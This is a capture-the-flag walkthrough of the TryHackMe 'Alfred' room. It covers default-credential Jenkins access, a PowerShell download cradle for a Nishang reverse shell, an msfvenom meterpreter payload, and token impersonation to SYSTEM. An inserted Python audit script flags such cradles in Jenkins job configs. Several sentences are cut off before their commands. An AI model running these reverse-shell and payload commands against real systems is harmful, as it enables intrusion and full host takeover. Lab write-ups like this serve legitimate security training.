Alfred is a subscription only room.
This task requires you to deploy the machine and load up Nishang to gain initial access. Nishang is a framework and a collection of scripts and payloads which enable usage of PowerShell for offensive security by nikhil_mitt.
Start by scanning the machine with nmap so we can see what ports are open.
This reveals three open ports: 80, 3389, and 8080.
Referring back to the nmap scan, there are two HTTP services: one on port 80 and another on port 8080. Let’s check these out.
This task requires us to crack the Jenkins login, which is on port 8080.
Jenkins default credentials
A simple Google search reveals the default admin username for Jenkins is “admin”.
After toying around with a few admin:password candidates (first trying some Batman-related passwords, i.e. Bruce, Wayne, Joker, etc.), I stumbled on the password before loading up any brute-force tools.
The password is... you guessed it... admin.
The username:password flag is
Now that we’ve gained access to Jenkins, let’s look for some remote code execution vulns.
The script first requires us to start a Python server that the target can download the script from.
The PowerShell script we need to download is available at the top of the page.
Start Python server
python3 -m http.server
This makes the directory where the command was run accessible on 0.0.0.0:8000. It is also reachable on your local IP, which you can find with the ip addr command.
So download the PowerShell script (above) and serve it from there; then the Jenkins console can download the PowerShell script and run it on the target machine.
TryHackMe provides a command for us to run on the host.
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
Of course, swap in your own IP and port for your-ip and your-port.
At first, I toyed with the Script Console, attempting to use some Java scripts to download and run the above PowerShell script.
But I gave up on this after figuring out you can run a shell script in the build options for the project. The script here runs on build.
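The build-step trick above is exactly what a Jenkins administrator should be looking for when reviewing job definitions. The following audit script is an added example, not part of the original write-up or of TryHackMe’s material: it parses a job’s config.xml, pulls the command text out of “Execute Windows batch command” / “Execute shell” build steps, and flags any step that looks like a remote download-and-execute cradle of the kind used in this room. The config.xml content and the IP in it are constructed for the example; the element names hudson.tasks.BatchFile and hudson.tasks.Shell are the real ones Jenkins writes, while the indicator patterns are a heuristic I chose, not an official list.

```python
"""Audit Jenkins job config.xml build steps for PowerShell download cradles.

Added defender-side example (not the write-up's own code). It walks the
<builders> section of a Jenkins job definition and reports shell/batch build
steps whose command text contains several "fetch a script over the network and
run it" indicators. The sample XML below is constructed for this example.
"""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample job: one benign step and one step carrying a download cradle.
SAMPLE_CONFIG_XML = """<project>
  <actions/>
  <description>example job</description>
  <builders>
    <hudson.tasks.BatchFile>
      <command>echo building &amp;&amp; dir</command>
    </hudson.tasks.BatchFile>
    <hudson.tasks.BatchFile>
      <command>powershell iex (New-Object Net.WebClient).DownloadString('http://10.0.0.5:8000/Invoke-PowerShellTcp.ps1')</command>
    </hudson.tasks.BatchFile>
  </builders>
</project>
"""

# Real Jenkins element names for "Execute Windows batch command" and "Execute shell".
BUILD_STEP_TAGS = ("hudson.tasks.BatchFile", "hudson.tasks.Shell")

# Heuristic indicators (chosen for this example) of a download-and-execute cradle.
CRADLE_PATTERNS = [
    ("webclient", re.compile(r"Net\.WebClient", re.I)),
    ("download", re.compile(r"DownloadString|DownloadFile", re.I)),
    ("in-memory-exec", re.compile(r"\biex\b|Invoke-Expression", re.I)),
    ("http-fetch", re.compile(r"Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b", re.I)),
    ("encoded-command", re.compile(r"-EncodedCommand\b|\s-e(nc)?\s", re.I)),
]


def extract_build_commands(config_xml: str) -> List[str]:
    """Return the command text of each shell/batch build step, in document order."""
    root = ET.fromstring(config_xml)
    builders = root.find("builders")
    if builders is None:
        return []
    return [
        (step.findtext("command") or "")
        for step in builders
        if step.tag in BUILD_STEP_TAGS
    ]


def cradle_indicators(command: str) -> List[str]:
    """Names of the cradle indicators present in one build-step command."""
    return [name for name, pattern in CRADLE_PATTERNS if pattern.search(command)]


def audit_config(config_xml: str, min_hits: int = 2) -> List[Dict]:
    """Flag build steps with at least `min_hits` indicators (two, to limit false positives
    from a lone curl or a lone 'download' word in a legitimate script)."""
    findings = []
    for idx, cmd in enumerate(extract_build_commands(config_xml)):
        hits = cradle_indicators(cmd)
        if len(hits) >= min_hits:
            findings.append({"step": idx, "command": cmd, "indicators": hits})
    return findings


if __name__ == "__main__":
    for finding in audit_config(SAMPLE_CONFIG_XML):
        print(f"build step {finding['step']}: {finding['command']}")
        print(f"  indicators: {', '.join(finding['indicators'])}")
```

Run it against each `jobs/<name>/config.xml` under JENKINS_HOME (or a copy of them) to get a list of jobs whose build steps deserve a closer look; the same check applied to the Jenkins build console log would catch a cradle that was added and then removed between reviews.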
Wait for it to finish.
Then, we need to run a netcat listener on the port we gave. Run the following command.
nc -l -p 1337
Then rebuild the Jenkins project.
And... we’re in!
From here, we need to find the user.txt flag.
Using some general knowledge, we cd .. up through the file system.
Eventually, we see something that clicks.
And finally, we find the user.txt file, and the flag.
Task 2 sees us generating an msfvenom payload by running the following command.
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe
I’d tried to download and run the msfvenom payload via the shell we’d already gotten, but to no avail.
This flag concerns the size of the msfvenom payload. We can see it by running the ls -la command: it’s 73802 bytes.
Instead, I found success by running it through the same build options we exploited earlier, but with the new payload.
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.11.8.219:8000/theJoker.exe','theJoker.exe')"
Before going through the build process, we need to launch the Metasploit “listener”: run msfconsole, then use exploit/multi/handler with the payload we used in the previous msfvenom command.
Now that we’re listening, we can run the build on Jenkins.
After rebuilding, we see the meterpreter session opens successfully.
Ugh, this was a bit of a nightmare.
So, flip the build options BACK to the original netcat route we took. Start a listener with
nc -l -p 1234
Once you get a shell, run the given PowerShell command from TryHackMe.
powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"
Make sure not to cd out of the folder.
Start-Process "theJoker.exe" to run the
Make sure you’re running the exploit/multi/handler for the shell.
From here, we can execute the shell command to get a system shell.
Then we can see all privileges with
To escape the shell, just hit
Then, we can load the incognito module to exploit two of the enabled privileges, using
Let’s see what tokens are available with
From here, we see that the BUILTIN\Administrators tokens are available and can be impersonated.
After running the command impersonate_token BUILTIN\\ADMINISTRATORS we get the required output. Note: the double backslash escapes the backslash.
The above confirms we’re impersonating
However, despite us impersonating someone with authority, our process might not have authority. So let’s grab the PID of the services.exe process and then migrate to that process.
Fire off the command
ps | grep services.exe
Then take the PID number (probably different for you) and run the migrate command to “move to” that process, which is owned by the user we’re impersonating.
Now that we’ve escalated privileges, to get the root flag we need to cd C:\Windows\System32\config, then